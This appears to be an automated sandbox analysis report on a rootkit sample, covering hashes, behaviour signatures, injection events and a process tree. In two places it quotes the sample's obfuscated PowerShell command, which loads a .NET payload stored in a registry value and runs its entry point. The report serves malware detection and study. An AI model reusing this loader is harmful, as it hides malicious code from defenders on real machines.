Overview
overview
10Static
static
10Bootkits/5...1a.exe
windows7-x64
1Bootkits/5...1a.exe
windows10-2004-x64
6Bootkits/6...86.exe
windows7-x64
7Bootkits/6...86.exe
windows10-2004-x64
7Bootkits/8...f6.msi
windows7-x64
7Bootkits/8...f6.msi
windows10-2004-x64
7Bootkits/f...b1.exe
windows7-x64
7Bootkits/f...b1.exe
windows10-2004-x64
Rootkits/0...c7.exe
windows7-x64
8Rootkits/0...c7.exe
windows10-2004-x64
8Rootkits/0...6d.exe
windows7-x64
10Rootkits/0...6d.exe
windows10-2004-x64
1Rootkits/0...ae.exe
windows7-x64
1Rootkits/0...ae.exe
windows10-2004-x64
1Rootkits/0...3e.exe
windows7-x64
7Rootkits/0...3e.exe
windows10-2004-x64
10Rootkits/0...10.exe
windows7-x64
7Rootkits/0...10.exe
windows10-2004-x64
7Rootkits/2...8e.dll
windows7-x64
1Rootkits/2...8e.dll
windows10-2004-x64
1Rootkits/2...a4.exe
windows7-x64
10Rootkits/2...a4.exe
windows10-2004-x64
Rootkits/4...1b.exe
windows7-x64
7Rootkits/4...1b.exe
windows10-2004-x64
7Rootkits/6...d9.exe
windows7-x64
1Rootkits/6...d9.exe
windows10-2004-x64
1Rootkits/7...e8.exe
windows7-x64
7Rootkits/7...e8.exe
windows10-2004-x64
7Rootkits/8...22.exe
windows7-x64
1Rootkits/8...22.exe
windows10-2004-x64
1Rootkits/9...99.exe
windows7-x64
8Rootkits/9...99.exe
windows10-2004-x64
8Analysis
-
max time kernel
173s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
08-11-2023 03:15
Behavioral task
behavioral1
Sample
Bootkits/5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Bootkits/5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral3
Sample
Bootkits/6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
Resource
win7-20231023-en
Behavioral task
behavioral4
Sample
Bootkits/6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral5
Sample
Bootkits/8dcc573293ae9a545655a47e23f106738a190f5318c31124bd3a73b12f128df6.msi
Resource
win7-20231020-en
Behavioral task
behavioral6
Sample
Bootkits/8dcc573293ae9a545655a47e23f106738a190f5318c31124bd3a73b12f128df6.msi
Resource
win10v2004-20231020-en
Behavioral task
behavioral7
Sample
Bootkits/f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Resource
win7-20231025-en
Behavioral task
behavioral8
Sample
Bootkits/f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral9
Sample
Rootkits/03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
Resource
win7-20231020-en
Behavioral task
behavioral10
Sample
Rootkits/03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral11
Sample
Rootkits/044d94183a778f39e47f255fcb985d20bfd885771a74217cfbca9e63d7d9936d.exe
Resource
win7-20231023-en
Behavioral task
behavioral12
Sample
Rootkits/044d94183a778f39e47f255fcb985d20bfd885771a74217cfbca9e63d7d9936d.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral13
Sample
Rootkits/0925b8985b19d7925d68186d666b0050a4cb3f2a577d64765d770a57a2eab9ae.exe
Resource
win7-20231020-en
Behavioral task
behavioral14
Sample
Rootkits/0925b8985b19d7925d68186d666b0050a4cb3f2a577d64765d770a57a2eab9ae.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral15
Sample
Rootkits/096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe
Resource
win7-20231023-en
Behavioral task
behavioral16
Sample
Rootkits/096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral17
Sample
Rootkits/0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Resource
win7-20231023-en
Behavioral task
behavioral18
Sample
Rootkits/0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral19
Sample
Rootkits/2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e.dll
Resource
win7-20231023-en
Behavioral task
behavioral20
Sample
Rootkits/2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral21
Sample
Rootkits/22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
Resource
win7-20231020-en
Behavioral task
behavioral22
Sample
Rootkits/22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral23
Sample
Rootkits/40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Resource
win7-20231023-en
Behavioral task
behavioral24
Sample
Rootkits/40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral25
Sample
Rootkits/659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9.exe
Resource
win7-20231025-en
Behavioral task
behavioral26
Sample
Rootkits/659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral27
Sample
Rootkits/757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Resource
win7-20231023-en
Behavioral task
behavioral28
Sample
Rootkits/757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral29
Sample
Rootkits/84ed7fec67de5621806dbb43af5167a5fc60ab7f2403448519dc0eca2b8f9022.exe
Resource
win7-20231023-en
Behavioral task
behavioral30
Sample
Rootkits/84ed7fec67de5621806dbb43af5167a5fc60ab7f2403448519dc0eca2b8f9022.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral31
Sample
Rootkits/9114dc1c44f6a1b7d63ca95e04541d833c49a3e65a717471042bd0ec19a3eb99.exe
Resource
win7-20231023-en
Behavioral task
behavioral32
Sample
Rootkits/9114dc1c44f6a1b7d63ca95e04541d833c49a3e65a717471042bd0ec19a3eb99.exe
Resource
win10v2004-20231023-en
General
-
Target
Rootkits/22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
-
Size
327KB
-
MD5
da87a0a2aba605908bf8b9a3f4377481
-
SHA1
5cac4ea0b3f0cc2d7c04655db12ad0443cbaa5cf
-
SHA256
22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4
-
SHA512
55a8a27a013cb2c3deda81779d89ab956a5f57d00a155496abc7bf3c5a87f3b7c41058ab3681cbbd0406f69ea01c4ffc3e5779c2ca676088a68cb87f19c34c28
-
SSDEEP
6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2476 created 424 2476 powershell.EXE winlogon.exe PID 2040 created 424 2040 powershell.EXE winlogon.exe -
Drops file in System32 directory 18 IoCs
Processes:
WMIADAP.EXEpowershell.EXEpowershell.EXEdescription ioc process File created C:\Windows\system32\perfh009.dat WMIADAP.EXE File opened for modification C:\Windows\system32\PerfStringBackup.INI WMIADAP.EXE File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h WMIADAP.EXE File created C:\Windows\system32\perfh007.dat WMIADAP.EXE File created C:\Windows\system32\perfc00C.dat WMIADAP.EXE File created C:\Windows\system32\perfh00C.dat WMIADAP.EXE File created C:\Windows\system32\perfc011.dat WMIADAP.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\perfc009.dat WMIADAP.EXE File created C:\Windows\system32\perfh011.dat WMIADAP.EXE File created C:\Windows\system32\perfh010.dat WMIADAP.EXE File created C:\Windows\system32\PerfStringBackup.TMP WMIADAP.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File created C:\Windows\system32\perfc007.dat WMIADAP.EXE File created C:\Windows\system32\perfc00A.dat WMIADAP.EXE File created C:\Windows\system32\perfh00A.dat WMIADAP.EXE File created C:\Windows\system32\perfc010.dat WMIADAP.EXE -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 2476 set thread context of 2624 2476 powershell.EXE dllhost.exe PID 2040 set thread context of 3036 2040 powershell.EXE dllhost.exe -
Drops file in Windows directory 9 IoCs
Processes:
22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exesvchost.exeWMIADAP.EXEdescription ioc process File created C:\Windows\Tasks\dialersvc32.job 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe File opened for modification C:\Windows\Tasks\dialersvc32.job 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe File created C:\Windows\Tasks\dialersvc64.job 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe File opened for modification C:\Windows\Tasks\dialersvc64.job 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File created C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini WMIADAP.EXE File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70fab252f211da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exepid process 2476 powershell.EXE 2476 powershell.EXE 2040 powershell.EXE 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe 2624 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1232 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2476 powershell.EXE Token: SeDebugPrivilege 2476 powershell.EXE Token: SeDebugPrivilege 2040 powershell.EXE Token: SeDebugPrivilege 2624 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
taskeng.exepowershell.EXEdllhost.exesvchost.exesvchost.exepowershell.EXEdescription pid process target process PID 2240 wrote to memory of 2476 2240 taskeng.exe powershell.EXE PID 2240 wrote to memory of 2476 2240 taskeng.exe powershell.EXE PID 2240 wrote to memory of 2476 2240 taskeng.exe powershell.EXE PID 2240 wrote to memory of 2040 2240 taskeng.exe powershell.EXE PID 2240 wrote to memory of 2040 2240 taskeng.exe powershell.EXE PID 2240 wrote to memory of 2040 2240 taskeng.exe powershell.EXE PID 2240 wrote to memory of 2040 2240 taskeng.exe powershell.EXE PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2476 wrote to memory of 2624 2476 powershell.EXE dllhost.exe PID 2624 wrote to memory of 424 2624 dllhost.exe winlogon.exe PID 2624 wrote to memory of 468 2624 dllhost.exe services.exe PID 2624 wrote to memory of 484 2624 dllhost.exe lsass.exe PID 2624 wrote to memory of 492 2624 dllhost.exe lsm.exe PID 2624 wrote to memory of 604 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 672 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 744 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 816 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 856 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 980 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 276 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 620 2624 dllhost.exe spoolsv.exe PID 2624 wrote to memory of 1044 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 1120 2624 dllhost.exe taskhost.exe PID 2624 wrote to memory of 1188 2624 dllhost.exe Dwm.exe PID 2624 wrote to memory of 1232 2624 dllhost.exe Explorer.EXE PID 2624 wrote to memory of 1916 2624 dllhost.exe svchost.exe PID 2624 wrote to memory of 2100 2624 dllhost.exe sppsvc.exe PID 2624 wrote to memory of 2240 2624 dllhost.exe taskeng.exe PID 2624 wrote to memory of 2724 2624 dllhost.exe conhost.exe PID 856 wrote to memory of 1556 856 svchost.exe WMIADAP.EXE PID 856 wrote to memory of 1556 856 svchost.exe WMIADAP.EXE PID 856 wrote to memory of 1556 856 svchost.exe WMIADAP.EXE PID 2624 wrote to memory of 1556 2624 dllhost.exe WMIADAP.EXE PID 2624 wrote to memory of 1556 2624 dllhost.exe WMIADAP.EXE PID 604 wrote to memory of 2196 604 svchost.exe wmiprvse.exe PID 604 wrote to memory of 2196 604 svchost.exe wmiprvse.exe PID 604 wrote to memory of 2196 604 svchost.exe wmiprvse.exe PID 2624 wrote to memory of 2196 2624 dllhost.exe wmiprvse.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe PID 2040 wrote to memory of 3036 2040 powershell.EXE dllhost.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:468
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2100
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1916
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1120
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1044
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:620
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:276
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {CE7F4F92-C94C-4DA0-A91D-BF3B41535D64} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1556
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:744
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding3⤵PID:2196
-
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:424
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{efcee286-0917-4c2b-be22-cfc7d5874deb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{2d979e1c-69cf-4fb8-b988-5c2b27bb2510}2⤵PID:3036
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\Rootkits\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe"C:\Users\Admin\AppData\Local\Temp\Rootkits\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe"2⤵
- Drops file in Windows directory
PID:2224
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1188
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2060891418-230511156-1170334656-1869851449139127007320924644454270518992071997409"1⤵PID:2724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD50f3d76321f0a7986b42b25a3aa554f82
SHA17036bba62109cc25da5d6a84d22b6edb954987c0
SHA256dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460
SHA512bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0
-
Filesize
150KB
MD5540138285295c68de32a419b7d9de687
SHA11cf6a2a0f53f0516ff9fe5ac733dbb5a9255ae56
SHA25633867c52f756f2b0f645f4bd503c65969d73676dcb14e6a6fdb2ffb11c7562eb
SHA5127c17c10d4b6165aa0c208811dc6d98e2f4e75e3da1cc2313cc7da9d657626beb3e4ec00b07b71376a7c549725d40db20d8952753e70acc86e87a8390e224a64a
-
Filesize
141KB
MD5831dbe568992299e589143ee8898e131
SHA1737726173aab8b76fe1f98104d72bb91abd273bf
SHA2564f22ef1625fb2a2370779d0992f80b8e5e5da8dc727aa99ade152044d28e9405
SHA51239015d29d593c9df59cdafbff95a6ddc000a5dbf767665b65f8ec65751e70315918c93d3583b922d32e9b6261b8c07023da660098ca79c5420b782c150b5c139
-
Filesize
138KB
MD5cf82e7354e591c1408eb2cc0e29dd274
SHA17e91bd50c3e6b64b81e2b5c1ce723f52e34748e9
SHA25659b5e6fbbe68f47db14a3c045b0ac1abb026c626ca4bee708fbd3940e6d2e06d
SHA51298bd4809c1c418be4100096bc9df328d2ad435c5615c082fa2bfa424935203107015862cd9c1737800b7f7bd020fea4538c325707927c1557bc3efebffb27620
-
Filesize
114KB
MD51f998386566e5f9b7f11cc79254d1820
SHA1e1da5fe1f305099b94de565d06bc6f36c6794481
SHA2561665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea
SHA512a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f
-
Filesize
668KB
MD55026297c7c445e7f6f705906a6f57c02
SHA14ec3b66d44b0d44ec139bd1475afd100748f9e91
SHA256506d3bec72805973df3b2e11aba4d074aeb4b26b7335536e79ea1145108817cc
SHA5125be8e51ecacda465b905df3e38ac114240d8fa6bae5bb17e8e53a87630454b57514ca0abbd8afefd798d450cd4ee89caf4391eeb837ced384260c188482fb48d
-
Filesize
634KB
MD51c678ee06bd02b5d9e4d51c3a4ec2d2b
SHA190aa7fdfaaa37fb4f2edfc8efc3994871087dedb
SHA2562d168ab31836a08d8ca00aab9685f040aac4052a7f10fbbf0c28e9f880a79dd3
SHA512ec665d7a20f27b2a0fe2475883009c6d34615cc2046d096de447ef57bcac9da0ae842be0556f5736f42d9c1c601fb8629896a2444990e508f7c573165088ab32
-
Filesize
715KB
MD5340af83514a525c50ffbbf8475ed62b7
SHA1e2f382ae75afe7df8a323320bbb2aafa1ff6e407
SHA256fb298e9a90476b4698def395a8ee1974c1cee3959b658662c730da915caea417
